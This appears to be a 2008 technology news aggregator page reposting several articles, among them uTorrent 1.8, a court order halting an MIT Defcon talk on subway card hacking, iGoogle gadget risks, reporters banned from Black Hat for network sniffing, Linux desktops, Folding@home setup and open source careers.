Followers

Sunday, August 10, 2008

uTorrent 1.8 Released, Mac Version Coming Soon

Written by Ernesto

After months of hard work and more than six months since their previous stable release, the uTorrent team has released version 1.8 of their BitTorrent client, with significant improvements and updates. Adding to the excitement, we were told that a public Alpha of the Mac version will be released in the next few weeks.

utorrentuTorrent is the preferred client among many BitTorrent users. In December we reported that the number of uTorrent users worldwide had more than doubled in a year. At the time, 5.1% of all Windows PCs had the BitTorrent client installed, and this number has probably been growing further since then.

Users have had to wait a while for this new release, since the last stable uTorrent, version 1.7.7, was released back in January. A lot of work has been done in the meantime though, and the list of changes and additions that were implemented is “absolutely massive”, to quote Firon. One of the most significant updates in the latest version of uTorrent is that it comes with built in IPv6 support, which improves connectivity and thus performance. Other new features are better Windows Firewall registration on Vista and improved distribution of new connections across torrents.

The journey from 1.7.7 has been a long one, but now that 1.8 stable is out, the uTorrent team will dedicate more time developing the long awaited Mac version of the client. uTorrent developer Greg Hazel told TorrentFreak that they will be “more heavily focused” on the Mac version now, which they have worked on for more than a year already. The good news for Mac users is that Greg hinted that the first public Alpha version will be released in just a few weeks.

uTorrent was initially developed by Ludvig Strigeus, and the first public version of the application was released in September 2005. A year later, in December 2006, uTorrent was acquired by BitTorrent Inc., but it will remain separated from other projects that the company is involved in. As Ashwin Navin, President and Co-founder of BitTorrent Inc. told us last year: “utorrent.com and uTorrent community will exist indefinitely. It’s vibrant and growing, and we value the feedback provided in the forums a lot.”

uTorrent 1.8 can be downloaded from the uTorrent website, and the list of changes, improvements and additions is available in the forum thread announcing the release.

Original here

Judge orders halt to Defcon speech on subway card hacking

MIT students Alessandro Chiesa, R.J. Ryan, Zack Anderson, and Electronic Frontier Foundation staff attorney Kurt Opsahl speak at a panel turned press conference at Defcon.

(Credit: Declan McCullagh/CNET News)

LAS VEGAS--A federal judge on Saturday granted the Massachusetts transit authority's request for an injunction preventing three MIT students from giving a presentation about hacking smartcards used in the Boston subway system.

The Electronic Frontier Foundation, which is representing the students, anticipates appealing the ruling, said EFF senior staff attorney Kurt Opsahl.

The undergraduate students had been scheduled to give a presentation Sunday afternoon at the Defcon hacker conference here that they had said would describe "several attacks to completely break the CharlieCard," an RFID card that the Massachusetts Bay Transportation Authority uses on the Boston T subway line. They also planned to release card-hacking software they had created, but canceled both the presentation and the release of the software.

U.S. District Judge Douglas Woodlock on Saturday ordered the students not to provide "program, information, software code, or command that would assist another in any material way to circumvent or otherwise attack the security of the Fare Media System." Woodlock granted the MBTA's request after a hastily convened hearing in Massachusetts that took place at 8 a.m. PDT on Saturday.

EFF staff attorney Kurt Opsahl said that the temporary restraining order is "violating their First Amendment rights"; another EFF attorney said a court order pre-emptively gagging security researchers was "unprecedented."

EFF attorneys appeared with the three students--Zack Anderson, R.J. Ryan, and Alessandro Chiesa--in front of a crowd of hundreds at an afternoon session at Defcon, but largely prevented them from answering questions, citing the lawsuit. Although Sunday's talk is canceled, Defcon organizers hinted that there may be a related presentation on a similar topic.

First page of subway-hacking presentation that was the subject of an injunction to stop its distribution--after it had already been distributed.

The students told reporters that they had, on their own, asked their professor to initiate contact with the MBTA a week before the government agency contacted them on July 30 or July 31. But the process was delayed because professor Ron Rivest was at a security conference near San Francisco, and no contact with MBTA was made at the time.

But then the conversations took a hostile turn when MBTA mentioned an FBI criminal investigation of the MIT students. In the "initial contact, they said the FBI was investigating and that was not--we didn't find that to be a very pleasing way to start a nice dialogue with them. And we got a little concerned about what was happening," said Anderson, one of the students.

EFF's Opsahl said the students only intended to "provide an interesting and useful talk, but not one that would allow people to defraud the Massachusetts" government.

The MBTA, which is a state government agency, alleges in its lawsuit that "disclosure of this information will significantly compromise the CharlieCard and CharlieTicket systems" and "constitutes a threat to public health or safety."

Its suit asks a judge to order the students "from publicly stating or indicating that the security or integrity of the CharlieCard pass, the CharlieTicket pass, or the MBTA's Fare Media systems has been compromised." The requested order would also prevent them from circulating the summary of their talk, from providing any technical information, and from distributing any software they created.

That could be difficult to enforce. Every one of the thousands of people here who registered for Defcon received a CD with the students' 87-page presentation titled "Anatomy of a Subway Hack." It recounts, in detail, how they wrote code to generate fake magcards. Also, it describes how they were able to use software they developed and $990 worth of hardware to read and clone the RFID-based CharlieCards.

Those CDs were distributed to conference attendees starting Thursday evening, meaning the injunction arrived nearly two days late. (On the other hand, the source code to the utilities--not included on the CD--was removed from web.mit.edu/zacka/www/subway/ by Saturday morning.)

Court documents filed by MBTA suggest that representatives of the transit agency tried to pressure the students into halting their talk. During a meeting with the students and MIT professor Ron Rivest on Monday, MBTA Deputy General Manager for Systemwide Modernization Joseph Kelly unsuccessfully tried to obtain a copy of their planned presentation. Kelly spoke with Rivest again on Friday. (There was initial confusion about whether the meeting was Monday or Tuesday.)

Chiesa, Ryan, and Anderson at an Electronic Frontier Foundation panel.

(Credit: Declan McCullagh/CNET News)

A representative of the Defcon convention, who asked that her name not be used, said that the students submitted their Powerpoint presentation at least a month ago. The presentation says--not-so-presciently--"what this talk is not: evidence in court (hopefully)." It also says: "THIS IS VERY ILLEGAL! So the following material is for educational use only."

In addition, what looked like a black and white faxed copy of the entire presentation was entered as evidence in publicly available court records available on the Web on Saturday, meaning any attempt to limit its distribution further will encounter an additional hurdle.

Also released as part of the public record was a document marked "confidential" and written by the researchers that explains exactly how the Charlie cards can be cloned and forged. "Our research shows that one can write software that will generate cards of any value up to $655.36," the document says.

The document also discusses the lack of physical security at the MBTA. "Doors were left unlocked allowing free entry in many subways," the document says. "The turnstile control boxes were unlocked at most stations. Most shocking, however, were the FVM control rooms that were occasionally left open."

One portion of the MBTA's legal complaint that drew jeers from the Defcon crowd came in its odd claim that "A CharlieTicket standing alone constitutes a 'computer'" under federal antihacking law.

This isn't the first time speakers at security conferences have been hauled into court by companies seeking to muzzle them.

In 2005, Cisco Systems filed a lawsuit against security researcher Michael Lynn hours after he gave a talk at Defcon on how attackers could take over Cisco routers. The case was ultimately settled. Four years earlier, the FBI took Russian crypto expert Dmitri Sklyarov into custody at his Las Vegas hotel one day after he gave a presentation at Defcon on insecurities in e-book security software.

Another excerpt from the presentation distributed to thousands of Defcon attendees on CDs.

Princeton University computer science professor Ed Felten and his co-authors received legal threats from the recording industry involving a planned talk at a Pittsburgh security conference--but pulled the paper from the event, even though no lawsuit materialized.

Research into flaws in the encryption that the Mifare Classic cards, used by the MBTA, landed Dutch researchers in court recently. NXP sued to block a Dutch University from publishing information about vulnerabilities in the encryption used in the RFID cards around the world. Last month, a court ruled that the university could publish the information.

Karsten Nohl, a University of Virginia graduate student who worked with others to break the Mifare Classic crypto algorithm last year, said MBTA should not have sued researchers who voluntarily discussed their findings with them.

"It has been known for years that magnetic stripe cards can easily be tampered with and MBTA should not have relied on the obscurity of their data-format as a security measure," Nohl said. "MBTA made it clear that they are not interested in cooperating with researchers on identifying and fixing vulnerabilities, but their lawsuit will motivate more research into the security of Boston's public transport system."

MIT's student newspaper has posted a copy of the presentation that was distributed on Defcon CDs and the subject of the court order.

In the video clip below MIT student Zack Anderson tells reporters how he felt when he learned about the lawsuit filed by the MBTA. The lawsuit was filed a few days after he had met with the agency to discuss concerns about his talk at Defcon. He is with fellow MIT students R.J. Ryan, Alessandro Chiesa and EFF attorney Marcia Hofmann, who was advising the students about what they could say in lieu of the temporary restraining order against them.

Original here

Google 'gadgets' called gateways for hackers

Hackers turned computer security specialists accuse Google of setting users up for online disasters by letting them personalize home pages with applications that could be tainted.

Software that hackers can trick people into installing on "iGoogle" home pages can track users' activities and control their machines, SecTheory chief executive Robert Hansen showed AFP on Friday.

"I could force you to download child porn or send subversive material to China," Hansen said. "The exploitation is almost limitless. Google has to fix it."

Google lets people customize iGoogle home pages with mini-software programs called "gadgets" such as to-do lists, news feeds, currency converters, and calendars.

Hackers can program malicious code into proffered gadgets or break into systems hosted by engineers providing legitimate mini-programs.

"It turns out a lot of people who develop these things aren't good at security," Hansen said, citing research he and Cenzic security analyst Tom Stracener shared at a notorious annual DefCon hacker gathering in Las Vegas.

"We pretty much break into anything we try."

Hackers can resort to a tactic of luring people to websites that trick people into installing applications in iGoogle home pages. A hacker can remotely control a victim's computer as long as the iGoogle page is open.

Gmail users face danger from the same "hole" in security, according to Hansen, whose hacker name is "RSnake."

"We've been telling Google about these vulnerabilities for years and they have not made corrective actions," Hansen said.

"They chose to open the doors and insomuch put a lot of consumers at risk."

Google says it checks gadgets for malicious code, rarely finding any, and that it removes tainted programs.

Original here

Reporters booted from Black Hat for hacking

By Humphrey Cheung

Las Vegas (NV) – Three French reporters attending the Black Hat computer security conference have been banned for life for sniffing the press room network. The hackers worked for a French security publication called Global Security Magazine and admitted to capturing login information of two other reporters covering the convention. Our legal sources tell us the three could face federal charges for wiretapping.

We’ve spoken to the two victims who are reporters from CNET and eWEEK. They told us the French reporters sneakily “huddled over their computers” while plugged into the Netgear Ethernet switches in the press room. The trio were also seen using an AirPcap USB capture card to sniff wireless traffic.

The French reporters captured traffic and then showed their results to the Wall of Sheep team in the hopes of getting the information posted. However, the team refused because there is an unwritten rule at Black Hat/Defcon that the press room network is off limits to scanning. Coincidentally, I was already in the room interviewing the Wall of Sheep team members and the French reporters let me take a picture of their screen.

I published that picture and a short accompanying article here. Shortly before the article went live, TG Daily’s editor in chief Wolfgang Gruener called CNET to warn them about a possible breach in their network security. Black Hat staff warned eWEEK’s Brian Price after our article went live.

Price confirmed to us that the login in the picture was indeed a valid one. That username and password has since been changed and Price is taking everything in stride. He told us that it was a good lesson in security and that he’ll be more careful in the future. On the CNET side, it appears the login information isn’t valid and that the French reporters possibly made up the information.

Image

The French reporters are Mauro Israel, Marc Brami, and Dominique Jouniot and they didn’t deny sniffing the network when confronted by Black Hat officials. They added that they conducted a classic man in the middle attack. The reporters have been permanently banned from Black Hat and Defcon, something which continues a long tradition of reporter bans at the hacker conventions. Last year, Dateline’s Michelle Madigan quickly escaped from Defcon after being caught secretly filming attendees. Before that, reporters and cameramen from Argentina and Israel had been booted.

Afterwards the head of Black Hat technical operations explained that people shouldn’t automatically assume that switched networks are safe from sniffing. He said there were several ways of obtaining traffic like arp address poisoning and running a rogue DHCP server to route traffic through the attacker’s laptop.

Kurt Opsahl, a senior staff attorney with the Electronic Frontier Foundation, said the French probably committed multiple crimes since there was a reasonable expectation of privacy on the press network. While he would not go on record about specific charges (since he wasn’t familiar with all the details), Opsahl said legal cases in the past have focused on whether people expect to be hacked on a specific network. At Black Hat and Defcon, you are almost guaranteed to be sniffed, hacked and owned by attendees, but the private press network is a different story. Another legal source told us the hacking attempt could be a federal felony under Title 18 section 2511 of the United States Code.

While the situation is very unfortunate and shady on the part of the French contingent, it does slam home the point that you can’t trust any network … even one that has been promised to be off-limits to scanning. As more details of the hacking emerged, several reporters in the room were scrambling to change their login details for their various content management systems.

Original here

Windows Live Messenger 9.0 to get new GUI, thanks to WPF

By Emil Protalinski

It looks like Christmas will be arriving early, especially for frustrated Windows Live Messenger testers. With the closing of the first Windows Live Messenger 9.0 beta program in June, testers were not given much information about what Microsoft was planning to put into version 9.0 (the first beta build showed few changes). The beta testing program officially closed on June 24, 2008, after which testers could still use the 9.0 beta Messenger client, but since the Connect page closed down, the installer was no longer available for download.

According to Messenger Stuff, the developer team has a few surprises up its sleeves. The first and biggest one comes in the form of the Windows Presentation Framework (WPF):

After being tipped off by an unaffiliated yet trustworthy source who – naturally – doesn't want to be identified, Messenger Stuff can now reveal that the new interface will use the graphics effects available through WPF [Windows Presentation Foundation] where supported (i.e. on Vista and with a decent graphics card).

WPF, which comes preinstalled on Windows Vista and is available for download for Windows XP, is a graphical subsystem in .NET Framework 3.0 that many have touted as a very consistent programming model. Unfortunately, few have put it to use, and Microsoft is hardly a leader in the area. The company's decision to use WPF is probably in response to complaints that competitors like Yahoo have already begun testing their own "next-generation" messenger clients, and while Yahoo is using WPF, Microsoft looked like it was quite content just twiddling its thumbs.

After gathering over 1,000 bugs and suggestions, sending testers through three different surveys, and sifting through nearly 5,000 messages in the newsgroup, Microsoft closed off the beta, as it was satisfied with the amount of feedback it had gained from the program. The team was ready to go back to work and hopefully it will implement some of the suggestions (tabbed convos please!). Microsoft is readying another beta of Windows Live Messenger 9.0 "later this year," to which it will invite previous testers.

Original here

Obama Supporters Prefer Firefox

The EOO staff and I check our traffic logs multiple times per day to see how many people are coming to the site, what they're looking at, etc. etc. It's amazing the depth of information that we get. One set of numbers that really sticks out is browser usage. We've had about 500,000 visitors over the past 3 months, of which 61% use Firefox, 23% use IE, and 11% use Safari. Opera and some browsers I haven't heard about before make up the rest of the traffic.

In talking to other webmasters, it seems that their browser usage stats hover around 65% IE to 30 % Firefox. Those numbers mirror what is reported on the web as the national average. So what's going on here? Is our site an anomaly, or are internet users trending towards Firefox and it's just not being reported yet?

I have to admit, that I'm pleased to see the numbers where they are. From a development perspective, IE has been a travesty for a long time. Firefox is (comparatively) closer to standards than IE, and so our development cycle typically consists of building new applications, like the Veepstakes game for example, getting them working in Firefox, and then hacking them to work in IE.

Who knows, maybe this could serve as a wakeup call to Microsoft to put out a better product. I'm not going to hold my breath on that one. I am curious though, are other websites experiencing the same shift? Or is it just in the political realm – maybe just on liberal / progressive sites?

Original here

Configuring Folding@home for Linux

Written by Pavs

From folding@home website:

Folding@home is a distributed computing project — people from throughout the world download and run software to band together to make one of the largest supercomputers in the world. Every computer takes the project closer to our goals. Folding@home uses novel computational methods coupled to distributed computing, to simulate problems millions of times more challenging than previously achieved.

Today we will show how to configure and run folding@home, and use a GUI frontend called Prothink to observe progress. I am sure there are others but we will focus on Prothink.

First we will download the extract folding@home client from it’s website over here.


(click for larger view)

Than we will move to the extracted folder and run the installation.sh script to start the configuration. sudo ./install.sh install

Here you can safely agree to the default value unless otherwise applicable (ie, more than one cpu). After you are done setting up configuration you can run folding@home by entering sudo /etc/init.d/foldingathome start. You can check with top or htop to see if it’s running.

In it’s default setup the best way to follow the progress of folding is to tail the FAHlog.txt located at /opt/foldingathome/1/

To get a much better progress view than this, we can use a nice little program called Prothink (Protein + Think), which you can download from here. Extract and move to the directory, and execute the setup file to start the configuration. python fahsetup.py.

One thing to note, during configuration is that it will ask for your unitinfo.txt, which is located at, /opt/foldingathome/1/. Run Prothink by typing python fahmain.py.

I usually do folding in all of my personal computers, when they are not in use and try to encourage my friends and family to do the same. Personally I believe this has a much greater significance than joining seti@home. Right now I didn’t join a group and submit my results anonymously, but I am thinking about creating a linuxhaxor group if there is enough interests. :) let me know guys, maybe we can make a tiny bit of difference in this world.

Original here

Linux on Servers? Great. On PCs? Not So Much

SAN FRANCISCO—PC OEMs offered a halfhearted endorsement of the Linux desktop on Wednesday, claiming that the operating system was mainly suited for low-cost appliances and PCs designed for education.

Two vendors of consumer Linux distributions, gOS and Xandros, spoke glowingly about the OS and its future. But representatives of three PC OEMs next to them – Dell, HP, and Lenovo – declined to commit to the operating system as a platform for their machines, with the exception of the education market.

The real future for Linux? Netbooks, Nettops, and other appliances, where Linux is being slotted in at the low end of the market as a Windows replacement. The message, if there was one, was that Linux's minstream success on the desktop was directly tied to the success of the low-cost netbook/nettop/appliance market, and to enthusiasts' efforts to install and run Linux themselves.

"In traditional desktop and notebook platforms, growth there is going to be tepid," said Jim Mann, a product strategist for HP's notebook division. "The really explosive growth is in appliances."

The question that opened the panel discussion here at LinuxWorld was a simple one: now that OEMs have begun shipping Linux on PCs, now what? The answer seemed to be that Linux remains a solid, dependable operating system, but with some significantly frayed edges.

In notebooks, for example, Linux "is not as good as Windows" in power management, according to Debra Kobs, a development team member and software strategist for Lenovo. That has helped Windows gain traction in the mid-range netbook market at price points at $500 or above, others noted. As the price climbs, the price of a Windows license becomes more easily factored in.

All three OEMs have eased Linux into the desktop and notebook market: Lenovo, by preloading Linux on ThinkPad notebooks; HP, with its Compaq nx5000 Linux-based notebook; and Dell, which as preloaded Ubuntu on certain desktop models, as a response to customer feedback on its IdeaStorm Web site.

This week, IBM, Canonical/Ubuntu, Novell and Red Hat and a number of unnamed hardware partners will ship "Microsoft-free" PCs with Lotus Notes and Symphony, the software companies said, beginning in 2009. When asked if they would be among the partners, all three OEMs were silent.

What's holding Linux back? When asked what they would have the Linux community improve, all three OEM representatives named power management. HP's Mann added the lack of good wireless support. John Hull, manager of an engineering team at Dell, wanted shorter boot times. And Mann added, "don't ever make me open a terminal window and access a command prompt."

That doesn't mean the OS hasn't had its successes. All three said that Linux had been well-received by the education market and third-world countries, and not just One Laptop Per Child low-cost PC efforts.

Still, the panel seemed to indicate that many still see Linux as just a cheaper alternative to Windows, rather than an operating system that has its own advantages. In the education example, for example, Lenovo's Kobs explained the appeal of Linux as a "low cost computing solution." "Looking at the business offering, one of the things we continue to look at on a regular basis is price," Kobs said. "It is one of the most important things."

Not surprisingly, the two Linux vendors represented on the panel took a different view. David Liu, the chief executive of gOS, which launched gOS 3 this week, said the Linux community needs to improve the user interface – not surprisingly, as that is gOS' goal – and the underlying drivers, and Linux applications. "I guess the short answer is can we change the UI and apps, and not just cost down", or lower the cost, of the platform, he said.

But Linux also has to carve out its own niche, he said. "How do we tell consumers and tell our partners on the hardware side…how it fits into the ecosystem?" he asked.

The answer may be in the way Linux is presented to the world through the low-cost netbook market. Still a tiny fraction of sales – roughly 3 percent, according to a recent Gartner report, Linux-based products like the Eee PC have become an unexpected hit with women aged 35 to 45, according to Kelly Fraser, a desktop product manager with Xandros.

The problem is that Microsoft, in turn, has recognized the issue and has extended the lifespan of its Windows XP Home Edition software to compete with Linux-based netbooks. "I think Linux companies like ourselves want to work closely with companies aligning themselves with the next wave of appliances," Liu said. "But we have to see the opportunity and take it before others step in and fill the gap," Liu said.

Original here

Open source technology is hungry for new college grads

By Amber Gillies

Many college graduates are finding it difficult to enter the information technology world with little or no work experience. There is no such thing as an entry-level position anymore, and more and more graduates are finding themselves in a catch-22 situation because of this.

Searching the numerous jobseeker Web sites, such as dice.com, will return thousands of positions available in the IT field. But when you look closely, most positions, such as an entry-level software engineer, have a minimum requirement of at least one year's work experience in a related field. The search field criterion doesn't even offer a selection for graduates with less than one year's experience.

You will find that some major companies, such as Microsoft, offer paid training courses to students pursuing a degree, but out of five positions listed at the time this article was written, only one would accept students who only had classroom coding experience. The remaining positions required one to two years of experience, and there were no positions available for recent graduates. When you consider the number of students searching for that "dream job" at a big corporation, you soon realize that your chances of getting a response to your application are slim to none -- especially if you don't have work experience. We have all heard, over and over, that there will always be a need for workers in technology, but getting your foot in the door is a whole 'nuther ballgame.

So what do you do next? Go get a job at a pizza joint, Taco Bell or Burger King until you land that dream job you are so desperately seeking? Stop right there. There are plenty of options available to you in open source technology. Developers in open source technology are always looking for someone who is going to help create the next new groundbreaking application that will take the world by storm. And the best part is, it's free and, in most cases, you can work from the comfort of your own home.

The key to being successful in the IT industry is interning while still attending college and taking some certification courses after graduation. Do some research. Find an open source technology company that will provide you with the tools and resources you will need to build your career. Open source spans platforms, middleware and applications from data centers to desktops. There are many companies that offer internship programs and certification courses.

Google and Red Hat are major contributors to Linux and open source technology. According to Google, each time you use the Google search engine, you are using open source software, which relies on the Linux kernel, GCC, Python and Samba, and commits code into each of those projects. Google maintains a healthy relationship with the open source software development community by releasing Google-created code, providing vital infrastructure, and by creating new open source software developers through programs such as the Google Summer of Code. Red Hat offers a summer intern program and certification courses for undergraduates, graduates, and candidates who hold a master's degree in business administration.

Google Summer of Code

Angela Byron, a former Google Summer of Code participant, began working for Drupal immediately after she completed the program.

Over the past three years, the GSoC program has brought together more than 1,500 students and 2,000 mentors from 90 countries worldwide, all for the love of code. This year alone, Google welcomed 1,125 student contributors and 175 free and open source projects into the program.

"Google's SoC is a formal sponsorship program tailored specifically to open source," Angela Byron says. Byron, a former student sponsored by Google in 2005 to participate in GSoC, is currently a senior Web architect for Lullabot, which provides consulting and training for Drupal and other open source software. The core Drupal software is a framework that power community-driven Web sites, and includes features such as internationalization, tagging, and an extensive roles and permissions system. The architecture supports more than 1,000 sub-projects in the form of contributed modules and themes.

"My primary role has changed from developing Drupal Web sites myself to consulting with large clients such as MTV, Sony BMG Records, BBC, and Popular Science magazine that use Drupal. My job is to help train their developers, help architect Web sites [mapping wireframes to Drupal functionality], and to impart best practices and advice that I've picked up from working in the Drupal community over the past three years. Lullabot also gives us time built into our working schedule to work on Drupal itself," Byron says.

Byron began working with the Drupal project during GSoC 2005. She is still actively involved with GSoC's mentoring organizations, and went on to become an organization administrator for GSoC 2006, and sits on the board of directors for the Drupal Association.

Byron thinks it is beneficial for college students to intern with a company to secure a position upon graduation. "An internship is a nice opportunity for both an employer and an employee to size each other up to see if they'd be a good match. And 'real world' experience will always trump anything you read in a book," she says.

Drupal internships and jobs at Drupal companies are available for college students and jobseekers. Some of the employers there may be open to taking on new grads or interns if asked, Byron says.

Byron says there are other opportunities available to college students as well. The Knight Foundation provides a grant program for people who want to implement innovations in local media. There's also a Knight-sponsored, Drupal-specific initiative. But none of this is necessary, she says, because getting involved in an open source project requires nothing more than doing some background reading to find good spots to look into -- and then diving in.

In 2005, Byron graduated from Nova Scotia Community College's IT programming program, which is a two-year diploma program. She has had no formal computer science training and no university education. "I've been mostly self-taught, but I went to school to help fill in some of the gaps," Byron says. "One of my instructors, Ian Macleod, mentioned GSoC. It sounded like a wonderful opportunity to me. I'd had a love of open source basically since I first heard the term in the late '90s, but I had always lacked the confidence to believe that I could be part of it. To be able to get my foot in the door, and to be paid to do it at the same time, was basically a dream opportunity. So I applied, figuring what the heck."

According to Byron, mentoring organizations [open source projects] from around the world can apply to Google to be chosen to participate in GSoC. Google allocates a number of "student slots" to the organization, each of which corresponds to a $5,000 investment: $500 for the organization and $4,500 for the student. Mentoring organizations then submit a list of possible project ideas, a list of mentors they have available, and answer some questions about how to handle problems that inevitably come up, such as student or mentor disappearances during GSoC. Once the mentoring organizations are chosen and announced by Google, the student application period is open. Students have the chance to apply to one or more mentoring organizations, with either a project of their own devising or by choosing one from the ideas list provided. During this period, the mentoring organizations rank the students' applications based on a number of criteria, including overall impact of the project to the organization [if it solves some long-standing problem or opens the project to new target audiences], how well-written the application is, how responsive the student is to clarification requests, etc.

"Someone reading about GSoC might come away thinking the sole goal of the program is for open source organizations to use Google's money to pay students to work on much-neglected or much-needed features," Byron says. "What a sweet deal. However, I believe GSoC is more about attracting and retaining talent to an open source project than it is about producing fantastic code.

"As an organization administrator for Drupal," she says, "I would much rather have only semi-fantastic code from a student who stays on with the project long-term, and gets involved in other aspects, such as documentation and core development, than a 100% working thing of beauty from a student who we never hear from again after GSoC is finished."

Angela Byron, left, helps a new contributor get started with Drupal at Drupalcon.

GSoC provides many benefits to students and mentoring organizations. "Students Work on something fun that they enjoy, and get paid to do it," Byron says. "It greatly lowers the barrier of entry to getting involved in an open source project." GSoC assigns a mentor to each student, who helps review code and works with students on any issues. "And if they can't help you, they know someone else who can," she says. Students also learn valuable life and technical skills, such as communication skills, how to work in a distributed and international team, and how to take complex problems and break them down into manageable tasks. GSoC also helps students become more marketable to prospective employers. Mentoring Organizations benefit by getting new contributors and new code for existing projects, and money from Google for each student and organization mentors. "It's a great way to 'bug test' your documentation to see if it's easy for new people to get up to speed," she says. "[Potentially] long-term contributors get completely immersed and start taking on additional roles in the project. Since open source projects thrive on contributors, the opportunity to obtain more of them is a huge benefit.

"Working in open source effectively gives you an open resume," Byron continues. "Instead of taking you at your word, your employer can actually look at your code and see its progression from when you first started on a project until now. They can view your interactions with fellow community members and see how you can effectively solve problems in a team environment. You demonstrate your ability to use collaboration tools necessary for serious software development."

Jobs available upon graduation depend on where, and to what extent, you get involved in open source and the open source community, according to Byron.

  • Programmer: Open source exposes you to development best-practices, how the "pros" do things, etc. It's a great way to take some fundamental knowledge of a particular language and learn it to a much greater depth.
  • Systems administrator: Sometimes working in an open source community requires tinkering around at the network/operating system level. You can turn this skill into a job.
  • Web designer: Web-based projects expose you to a lot of knowledge required on the front-end of things, such as XHTML, CSS, JavaScript, etc.
  • Designer: Some open source communities know a lot about coding, and not a lot about design. Coming into a project with an eye for design can help you to build your portfolio with icons, advertisements, page designs, and more.
  • Instructor: If you start to really know your field, you can get jobs teaching about the project or areas related to the project.
  • Technical writer: Diving into documentation can provide you with valuable experience, which can turn into a career as an author for technical documentation.
  • Translator: Open source gives you a chance to work in an international community. Time spent learning how to translate between languages can also turn into a job.
  • Specialist: Some open source projects are extremely powerful, but require depth of knowledge in order to get the most out of the tool. If you have studied the guts of a program, and know it inside and out, you may be able to tap into a niche market.
  • Project manager: Depending on the project, open source communities may provide opportunities for getting involved in a management capacity. Skills managing an open source project can be translated directly into skills managing a "real world" project as well.

Byron says she loved becoming a part of a thriving open source community, the challenge of the project, learning new things every day, and helping other people. "This program served to completely shatter the myths I had about how open source projects worked. I thought everyone who works on open source is this enormous genius with a huge brain and is some sort of god of programming, which paralyzed me from getting involved in open source for nearly 10 years," she says. This perspective is hilarious to her now. The issue queues are filled with patches that break things, use totally inefficient algorithms, and even cause security holes, she says. "Everyone contributes what they can, whether it's a starter solution, a fantastic algorithm that'll blow your mind, a confirmation that the change works on Internet Explorer 6 under Windows XP, or documentation that has proper grammar and sentence structure," she says.

Byron's work within the open source community was a huge stepping stone in her career. She learned time management skills because she was responsible for managing her own time, setting her own deadlines, and sticking to them. She learned better development skills and how to work in a distributed, culturally diverse team. "Suddenly I was collaborating with people in Hungary, Germany, and the United States," she says.

Byron offers some sound advice for students who have never worked in a developmental environment. She had never installed Drupal before GSoC started and she needed to go from knowing nothing about it to being able to code something that worked with it in a short period of time. "Get over the fear of asking questions," she says. "Instead of smashing your face on the problem for three days, mentors are available who will answer your question in five minutes. Realizing that it's perfectly OK to ask questions [and, in fact, encouraged], was one of the hurdles I had to get over. Students also have the tendency to avoid committing projects until they're so clean and shiny you can eat off them. When I finally learned to 'commit early, commit often,' I had fewer headaches and a lot more help," she says.

Byron chose Drupal as her mentoring organization because she had seen it used on Firefox, which is a grassroots marketing and activism Web site for the open source browser, she says. "I chose to apply for the 'Quiz module,' which allows people to use Drupal to build Web-based quizzes and tally the results. The idea was for educators to be able to use Drupal's community features such as commenting, ratings, and revisions to collaborate together and come up with the best questions possible. Three years later, I am happy to report that the module is still being actively maintained by other members of the Drupal community, and it's being used on some high-profile Drupal Web sites, such as Lifetime Television.

Within days of completing GSoC, people in the community began paying Byron to make themes, code modules, fix bugs, etc. She suddenly found herself to be an independent consultant with her own home-based Drupal business. "One of the people I did contract work for was Kieran Lal, who was with a Drupal company called CivicSpace Labs. He had seen me actively participating in the Drupal community, and paid me to drive a couple of patches home, and to write some gnarly technical documentation about the new Form API that had just been added to Drupal. After this kind of 'test drive,' he ended up hiring me to work full time, and that became my first Drupal job in November 2005 -- three months after completing GSoC," Byron says.

Currently, Byron manages Drupal's participation in GSoC. Each year, she finds more than 50 mentors and helps them build an ideas list. She helps manage the application voting process, status reports, and acts as a general resource for anyone [student or mentor], who has problems during GSoC. She is behind efforts that help get new contributors into the Drupal project. "Last year, I helped manage Drupal's participation in the Google Highly Open Participation contest, which was a GSoC-like program, but for 13- to 18-year-old students, with a focus on short-term tasks rather than two-month long projects," she says.

Byron also manages Drupalchix, so women in the Drupal community will have a safe place to ask questions, talk about their experiences, and discuss how to increase the number of women involved with the project. She is also on the Drupal documentation team, and actively recruits others to help out. She has been a Drupal speaker at Google, at the Women in Open Source conference at SCALE 2008, and several other events.

During the past two years of mentoring at GSoC, some of her participating college students have become successful, including Jimmy Berry, Aron Novak and Rok Žlender, just to name a few. "Berry was a GHOP student who increased Drupal's automated test coverage by many orders of magnitude, and is now working on the Usability Testing Suite, which will allow field testing of proposed user interface changes in order to get immediate feedback from users. Novak is a three-time GSoCer with Drupal, who is passionate about re-tooling Drupal's feed aggregation system," Byron says. "Žlender's GSoC project was around an automated testing framework for Drupal, and he was hired by NowPublic, a citizen journalism Web site powered by Drupal, to help manage internal testing procedures. Several of our students have gone onto jobs within Drupal shops and one at Google itself."

Red Hat

Google and Drupal are not the only companies seeing a boom in open source technology. The number of Red Hat-sponsored open source projects increased from 16,000 in 2001 to 150,000 in 2007.

DeLisa Alexander, senior vice president of Human Capital at Red Hat, doesn't believe it is necessary for college students to intern with a company to secure a position upon graduation. "People often get jobs at companies like Red Hat, with no previous relationship to the company. However, interning certainly can assist in opening doors and building relationships that lead to full-time employment," Alexander says.

In addition to entry-level positions in software maintenance and technical support, Alexander says there are many other positions available to graduates who have worked on open source projects. "With a background working on open source projects," Alexander says, "there are related roles in engineering, sales and marketing. Positions like these are available at Red Hat, and candidates can review our careers site to find more information." There are many jobs available to graduates, who don't have general exposure to open source, but have Linux experience, and have the desire to learn more. "Having Linux systems management experience helps differentiate an applicant," Alexander says.

According to Alexander, Red Hat offers jobs to college students with excellent open source coding skills. "This is often facilitated by the close relationship that Red Hat maintains with the Fedora community.

"At Red Hat, our new hires must have the basic skills we require to perform the job, so while we don't offer 'on-the-job training,' we do offer opportunities to enhance core skills with additional training. For example, with our associate technical support engineer role, new hires participate in six weeks of in-house training and then sit for their Red Hat Certified Engineer certification, which is paid for by Red Hat," Alexander says.

Red Hat offers a summer intern program for undergraduates, graduates and MBAs. "We [Red Hat] have a three-month intern program, where interns work for specific departments and participate in cross-functional projects. The internship program delivers a robust exposure to open source," Alexander says.

Graduates trying to obtain an entry-level position with Red Hat need to be passionate about open source, and Red Hat's mission and values, according to Alexander. "Beyond that, as a growing company and a leader in the open source community, we look for entry-level employees who can demonstrate an ability to scale with Red Hat," she says. "With regard to specific technical skills, experience with Linux up-stream work, Java, C, C++, Perl and Python are big pluses."

If, after graduation, you are having trouble obtaining an entry-level position, Alexander says it is important for you to continually grow and adapt your skill set. "One approach for this is to seek additional education or certifications that are in high demand in the marketplace. For people focused on an open source career, a RHCE certification could be a good opportunity.

